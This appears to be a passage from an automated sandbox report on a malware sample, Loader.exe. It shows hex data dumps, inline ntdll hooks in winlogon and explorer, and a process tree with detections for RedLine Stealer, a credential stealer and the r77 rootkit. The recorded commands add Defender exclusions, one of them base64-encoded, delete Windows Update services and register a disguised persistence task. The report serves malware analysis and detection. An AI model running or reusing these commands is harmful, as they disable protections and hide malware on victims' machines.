2022-11-07 22:49:10 UTC	13737	IN	Data Raw: 3d b9 ad 81 57 c7 de 90 d9 ad d5 83 cc 20 1e 9f 40 b4 a7 37 49 d3 5a 1a e9 b3 0c b2 2e c4 65 0a 3d 92 56 cc 48 30 7e 76 ec 63 1f 4d af dc 09 a8 ce 2c e2 4e da c6 63 5e 62 87 7c 8d e6 de 73 df 3b 0c cb 55 0f db 02 6d 11 cb 55 a9 24 b2 c9 cb f3 20 9f 95 d7 af 64 a1 b9 c7 fd 07 b2 27 c9 c7 98 bb b6 ce 9d 55 be 93 f1 f2 43 2c b3 26 51 16 a8 d2 92 9d a4 f1 85 b5 1e 6d 5e 3a 35 f8 fa 5d 37 e1 de a2 de 6f 4d 16 ce cf 05 66 a7 ec 1e 1a 5c b5 50 3c 99 03 5b a3 ba a0 e4 be 1e 5f 67 5f 3c 3b c4 aa bd 2a ee 4c dc 28 6d 91 73 87 e3 d6 1d 63 92 f1 d3 8e 3a 16 c4 50 70 a2 ea cc a3 96 fc 4f 51 0c 02 41 f4 9b b7 b9 37 e1 e1 2a 55 16 88 f9 ed 29 18 26 65 d3 9b 93 85 c8 67 4d 8f 52 72 09 14 1f fe e3 38 57 06 f5 71 65 6b 7e f8 2b 21 83 67 99 99 a8 8e 78 81 f7 97 b3 22 03 34 Data Ascii: =W @7IZ.e=VH0~vcM,Nc^b\|s;UmU$ d'UC,&Qm^:5]7oMf\P<[_g_<;L(msc:PpOQA7U)&egMRr8Wqek~+!gx"4
2022-11-07 22:49:10 UTC	13753	IN	Data Raw: e6 88 8f 7b 8a 9d 6f c1 08 ca 8d 60 f1 f1 46 7c 4a 88 7f e2 52 fc 9e c3 03 5a 4d b5 f9 b9 7f 11 9f e2 63 8e 3f f3 7f 46 f0 1e 1f 0a 57 e7 80 e2 c7 76 b1 82 38 f9 04 9b 08 fb 1d 31 02 38 39 05 70 72 fe 3c 6e dc db 07 79 90 f2 7d f8 ab af 4b 07 a7 bf 1d c4 4a 09 78 2d 86 51 76 7e 40 88 93 ee 01 1f 33 dd 8b 9b 0a ee a7 07 71 4b fc 3d f0 cf e2 a7 7f 06 9e f7 e0 be 39 88 a9 12 e2 a7 9f 76 31 b8 14 f3 33 96 fa 6b 7e bf 3f 82 4d bb 8b ff 28 ce 77 e5 8d 78 81 ee 1b 71 0c 3e de aa 95 aa 88 15 3d d3 8d 15 26 c4 59 c7 30 c2 07 b1 df 5f 62 c0 bf c6 5e 09 f1 d7 a6 4c ec 72 f8 19 ec 12 54 0a 27 e7 3e 7e c9 a3 e2 b4 b1 9b b0 e7 3f f9 f1 b2 5f 68 df 8b bd 1e 40 18 d7 07 e1 26 34 3e 16 8b 11 de db 37 8a dd 4b f1 fd 23 f4 07 f6 8f 6c 2f dd d7 92 da 38 f9 b1 78 28 df 8e df Data Ascii: {o`F\|JRZMc?FWv8189pr<ny}KJx-Qv~@3qK=9v13k~?M(wxq>=&Y0_b^LrT'>~?_h@&4>7K#l/8x(
2022-11-07 22:49:10 UTC	13769	IN	Data Raw: ef 7d 26 75 8f 7d 58 cd 04 c7 ac da 9d 55 4b 9c 1d 9a ae cc 39 1c ee 3c 75 f0 95 07 cc 77 53 5f 9f 79 bf 6d c2 bd 33 13 fa 03 83 c1 a3 12 b4 7c e4 94 96 18 c6 a7 18 54 bf 00 f9 af 06 6e 6f b1 3d 58 e8 d7 67 f8 b8 c2 d5 8e ab ad cb 53 9c f4 56 5c da 15 7b da 0c 4c f9 50 71 c5 bf e6 44 02 88 8f c8 cc ac 68 8b ca 00 8c e9 b4 75 ce f4 0c 7f ef f8 b3 f9 c6 3d e7 c8 c5 aa f4 cc 39 a0 b1 66 73 f0 11 2f 30 d5 25 1e 38 f5 9e 71 71 fb ee 0d 2a 13 9f 58 cb c7 26 7b d5 6d a9 9c a7 13 60 55 b7 af a6 ac 60 f8 a5 7e a5 9a a7 9e f2 4e 6f 98 c2 8e d3 98 f4 f9 82 7f 6d f1 f6 7b ea 75 43 02 66 f7 98 7f ff 56 82 56 eb e4 09 72 f3 b3 95 9c 67 d9 16 be 57 4a b2 eb 9e 63 5c a1 35 eb f9 68 f0 d5 ce b4 34 35 21 f4 89 4a ce b1 97 20 4f 63 40 c0 72 c6 73 b7 d0 23 ee 2b c2 9b f4 03 Data Ascii: }&u}XUK9<uwS_ym3\|Tno=XgSV\{LPqDhu=9fs/0%8qq*X&{m`U`~Nom{uCfVVrgWJc\5h45!J Oc@rs#+
2022-11-07 22:49:10 UTC	13785	IN	Data Raw: 14 1f 67 07 90 83 e3 7c 25 c2 23 ba 20 59 27 4b cc 86 18 1b 9b 1b 31 07 7b 81 65 1e 3e 6e 26 41 4d 61 7b 46 e5 86 a9 7c 8e 74 18 2a 1e cf 5e 7c 7c 1a 34 7f 38 be 64 05 e1 f8 c8 13 c7 e8 24 43 80 23 92 8d 73 91 0c 8e 29 22 39 b6 45 90 0e a7 c9 a5 cb 66 31 09 ae 87 c0 d6 c7 e4 87 2d 8e a8 9f fd 48 a6 36 01 a8 41 38 7e 13 ce 2e 14 71 93 8b e0 7d 8e 80 34 33 ae f9 c5 ea 85 11 d2 89 71 f0 09 d6 9a b5 94 76 22 89 76 c6 fc 8b 76 70 b8 a1 02 e1 46 20 d0 56 10 d2 19 54 fc 84 db c9 48 b3 72 12 c5 a1 c3 68 2e f0 56 08 71 a8 2b a2 46 2d 25 ca d9 d2 c6 7e 57 39 75 88 9b bc 29 e5 a4 c9 2b be c5 c7 e0 ed 74 03 21 34 2d d0 95 a0 01 c5 ef 0c 9b 90 98 8b e3 65 1c 52 8b f3 cc d8 69 f2 a0 c8 f6 c9 f3 eb 22 33 ef 8f a4 14 4e d2 f2 89 81 ee b3 91 44 4c 08 a4 e5 43 b8 8a 6a 89 Data Ascii: g\|%# Y'K1{e>n&AMa{F\|t*^\|\|48d$C#s)"9Ef1-H6A8~.q}43qv"vvpF VTHrh.Vq+F-%~W9u)+t!4-eRi"3NDLCj
2022-11-07 22:49:10 UTC	13801	IN	Data Raw: f6 92 ed 3d 78 ab da 6d ad ed 46 db 4d b2 0b b0 53 62 6a c1 75 1d c7 f4 63 ce 66 86 33 97 31 d7 30 2f 33 af 33 ef c1 33 53 c6 54 b2 d7 b0 37 b4 ff cb fe 92 bd bc 43 2f 07 13 87 cd 0e 83 59 5c d6 4b f6 6c 47 35 a7 0d 4e b9 4e f9 4e af 9c 3e 3b 69 39 d7 38 9b 71 9f 70 df 71 03 78 80 0f 20 95 02 b9 51 86 39 c3 8e e1 c8 98 c0 88 63 ac 67 1c 63 9c 63 5c 61 e4 33 3e 30 5a 18 4a d6 13 ad 83 ac 87 da 2c b4 3b 6b 3f c8 61 07 fb 39 bb 96 dd c4 36 71 7c cb 59 ee b4 8e bb 11 b6 f3 8a db cc 03 eb b0 5c 66 d8 5c 07 30 86 41 08 b6 88 11 c3 48 64 ec 85 ed dc 64 3c 66 bc 81 ed f4 b1 76 b0 f6 b7 5e 6a 9d 00 67 9b 66 7d d4 fa 8c f5 45 eb 6c eb 67 d6 6f ad ab ad eb ac 9b ad bb d9 18 db 0c b4 61 d8 30 6d c6 d9 f8 d9 cc b3 09 b3 89 b0 f9 c3 e6 2f 9b cb 36 76 b6 1e b6 41 b6 11 Data Ascii: =xmFMSbjucf310/333ST7C/Y\KlG5NNN>;i98qpqx Q9cgcc\a3>0ZJ,;k?a96q\|Y\f\0AHdd<fv^jgf}Elgoa0m/6vA

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
ZwEnumerateKey	INLINE	winlogon.exe, explorer.exe
NtQuerySystemInformation	INLINE	winlogon.exe, explorer.exe
ZwResumeThread	INLINE	winlogon.exe, explorer.exe
NtDeviceIoControlFile	INLINE	winlogon.exe, explorer.exe
ZwDeviceIoControlFile	INLINE	winlogon.exe, explorer.exe
NtEnumerateKey	INLINE	winlogon.exe, explorer.exe
NtQueryDirectoryFile	INLINE	winlogon.exe, explorer.exe
ZwEnumerateValueKey	INLINE	winlogon.exe, explorer.exe
ZwQuerySystemInformation	INLINE	winlogon.exe, explorer.exe
NtResumeThread	INLINE	winlogon.exe, explorer.exe
RtlGetNativeSystemInformation	INLINE	winlogon.exe, explorer.exe
NtQueryDirectoryFileEx	INLINE	winlogon.exe, explorer.exe
NtEnumerateValueKey	INLINE	winlogon.exe, explorer.exe
ZwQueryDirectoryFileEx	INLINE	winlogon.exe, explorer.exe
ZwQueryDirectoryFile	INLINE	winlogon.exe, explorer.exe

Processes

Process: winlogon.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x93 0x33 0x35 0x5D 0xDF
NtQuerySystemInformation	INLINE	0xE9 0x93 0x33 0x35 0x5B 0xBF
ZwResumeThread	INLINE	0xE9 0x91 0x13 0x35 0x58 0x8F
NtDeviceIoControlFile	INLINE	0xE9 0x97 0x73 0x36 0x64 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x97 0x73 0x36 0x64 0x4F
NtEnumerateKey	INLINE	0xE9 0x93 0x33 0x35 0x5D 0xDF
NtQueryDirectoryFile	INLINE	0xE9 0x91 0x13 0x35 0x5C 0xCF
ZwEnumerateValueKey	INLINE	0xE9 0x97 0x73 0x36 0x61 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x93 0x33 0x35 0x5B 0xBF
NtResumeThread	INLINE	0xE9 0x91 0x13 0x35 0x58 0x8F
RtlGetNativeSystemInformation	INLINE	0xE9 0x93 0x33 0x35 0x5B 0xBF
NtQueryDirectoryFileEx	INLINE	0xE9 0x9E 0xE3 0x33 0x3B 0xBF
NtEnumerateValueKey	INLINE	0xE9 0x97 0x73 0x36 0x61 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x9E 0xE3 0x33 0x3B 0xBF
ZwQueryDirectoryFile	INLINE	0xE9 0x91 0x13 0x35 0x5C 0xCF

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x93 0x33 0x35 0x5D 0xDF
NtQuerySystemInformation	INLINE	0xE9 0x93 0x33 0x35 0x5B 0xBF
ZwResumeThread	INLINE	0xE9 0x91 0x13 0x35 0x58 0x8F
NtDeviceIoControlFile	INLINE	0xE9 0x97 0x73 0x36 0x64 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x97 0x73 0x36 0x64 0x4F
NtEnumerateKey	INLINE	0xE9 0x93 0x33 0x35 0x5D 0xDF
NtQueryDirectoryFile	INLINE	0xE9 0x91 0x13 0x35 0x5C 0xCF
ZwEnumerateValueKey	INLINE	0xE9 0x97 0x73 0x36 0x61 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x93 0x33 0x35 0x5B 0xBF
NtResumeThread	INLINE	0xE9 0x91 0x13 0x35 0x58 0x8F
RtlGetNativeSystemInformation	INLINE	0xE9 0x93 0x33 0x35 0x5B 0xBF
NtQueryDirectoryFileEx	INLINE	0xE9 0x9E 0xE3 0x33 0x3B 0xBF
NtEnumerateValueKey	INLINE	0xE9 0x97 0x73 0x36 0x61 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x9E 0xE3 0x33 0x3B 0xBF
ZwQueryDirectoryFile	INLINE	0xE9 0x91 0x13 0x35 0x5C 0xCF

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Loader.exePID: 5244, Parent PID: 3320

General

Target ID:	0
Start time:	23:48:02
Start date:	07/11/2022
Path:	C:\Users\user\Desktop\Loader.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Loader.exe
Imagebase:	0xae0000
File size:	359424 bytes
MD5 hash:	4E0323EDBAFA68173EA06B1EC8B95195
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.256139180.0000000000A92000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5124, Parent PID: 5244

General

Target ID:	1
Start time:	23:48:03
Start date:	07/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: AppLaunch.exePID: 100012, Parent PID: 5244

General

Target ID:	2
Start time:	23:48:08
Start date:	07/11/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Imagebase:	0xc10000
File size:	98912 bytes
MD5 hash:	6807F903AC06FF7E1670181378690B22
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.423897208.00000000074F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: ofg.exePID: 3628, Parent PID: 100012

General

Target ID:	13
Start time:	23:48:59
Start date:	07/11/2022
Path:	C:\Users\user\AppData\Local\Microsoft\ofg.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Microsoft\ofg.exe"
Imagebase:	0xe00000
File size:	5021696 bytes
MD5 hash:	CD4AC234EE1C9FCA552D11FF31B9C5CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 65%, ReversingLabs Detection: 20%, Metadefender, Browse
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 4584, Parent PID: 3628

General

Target ID:	14
Start time:	23:49:02
Start date:	07/11/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe "/C schtasks /create /tn \ipNnOYSRDI /tr \"C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
Imagebase:	0x7ff7651b0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1436, Parent PID: 4584

General

Target ID:	15
Start time:	23:49:02
Start date:	07/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 5208, Parent PID: 4584

General

Target ID:	16
Start time:	23:49:02
Start date:	07/11/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /tn \ipNnOYSRDI /tr \"C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
Imagebase:	0x7ff7710d0000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svcupdater.exePID: 1048, Parent PID: 1100

General

Target ID:	17
Start time:	23:49:03
Start date:	07/11/2022
Path:	C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe
Imagebase:	0x900000
File size:	5021696 bytes
MD5 hash:	CD4AC234EE1C9FCA552D11FF31B9C5CC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000011.00000002.551221495.0000019C33010000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000011.00000002.551047553.0000019C32FE0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 65%, ReversingLabs Detection: 20%, Metadefender, Browse

Show Windows behavior

Chronological Activities

Analysis Process: brave.exePID: 2804, Parent PID: 100012

General

Target ID:	18
Start time:	23:49:05
Start date:	07/11/2022
Path:	C:\Users\user\AppData\Local\Microsoft\brave.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Microsoft\brave.exe"
Imagebase:	0x7ff666770000
File size:	2884608 bytes
MD5 hash:	9253ED091D81E076A3037E12AF3DC871
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 85%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6140, Parent PID: 2804

General

Target ID:	19
Start time:	23:49:07
Start date:	07/11/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff6f4710000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4908, Parent PID: 6140

General

Target ID:	20
Start time:	23:49:07
Start date:	07/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: setup.exePID: 6232, Parent PID: 100012

General

Target ID:	21
Start time:	23:49:10
Start date:	07/11/2022
Path:	C:\Users\user\AppData\Local\Microsoft\setup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Microsoft\setup.exe"
Imagebase:	0x400000
File size:	6231483 bytes
MD5 hash:	96CBBD2930425374E0D2D6E251BE9834
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 38%, ReversingLabs Detection: 0%, Metadefender, Browse

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6264, Parent PID: 6232

General

Target ID:	22
Start time:	23:49:13
Start date:	07/11/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA==
Imagebase:	0xe60000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6272, Parent PID: 6264

General

Target ID:	23
Start time:	23:49:13
Start date:	07/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6504, Parent PID: 2804

General

Target ID:	25
Start time:	23:49:20
Start date:	07/11/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Imagebase:	0x7ff7651b0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6512, Parent PID: 2804

General

Target ID:	26
Start time:	23:49:20
Start date:	07/11/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff7651b0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6520, Parent PID: 6504

General

Target ID:	27
Start time:	23:49:20
Start date:	07/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6528, Parent PID: 2804

General

Target ID:	28
Start time:	23:49:20
Start date:	07/11/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Imagebase:	0x7ff6f4710000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6536, Parent PID: 6512

General

Target ID:	29
Start time:	23:49:20
Start date:	07/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6556, Parent PID: 6528

General

Target ID:	30
Start time:	23:49:20
Start date:	07/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 6604, Parent PID: 6504

General

Target ID:	31
Start time:	23:49:20
Start date:	07/11/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff6f7580000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 6612, Parent PID: 6512

General

Target ID:	32
Start time:	23:49:20
Start date:	07/11/2022
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-ac 0
Imagebase:	0x7ff6538e0000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 6656, Parent PID: 6512

General

Target ID:	33
Start time:	23:49:21
Start date:	07/11/2022
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-dc 0
Imagebase:	0x7ff6538e0000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 6696, Parent PID: 6504

General

Target ID:	34
Start time:	23:49:22
Start date:	07/11/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff6f7580000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 6748, Parent PID: 6512

General

Target ID:	35
Start time:	23:49:23
Start date:	07/11/2022
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-ac 0
Imagebase:	0x7ff6538e0000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 6764, Parent PID: 6504

General

Target ID:	36
Start time:	23:49:24
Start date:	07/11/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff6f7580000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 6788, Parent PID: 6512

General

Target ID:	37
Start time:	23:49:24
Start date:	07/11/2022
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff6538e0000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 6796, Parent PID: 6504

General

Target ID:	38
Start time:	23:49:24
Start date:	07/11/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff6f7580000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 6820, Parent PID: 6504

General

Target ID:	39
Start time:	23:49:25
Start date:	07/11/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff6f7580000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 6876, Parent PID: 6504

General

Target ID:	40
Start time:	23:49:26
Start date:	07/11/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
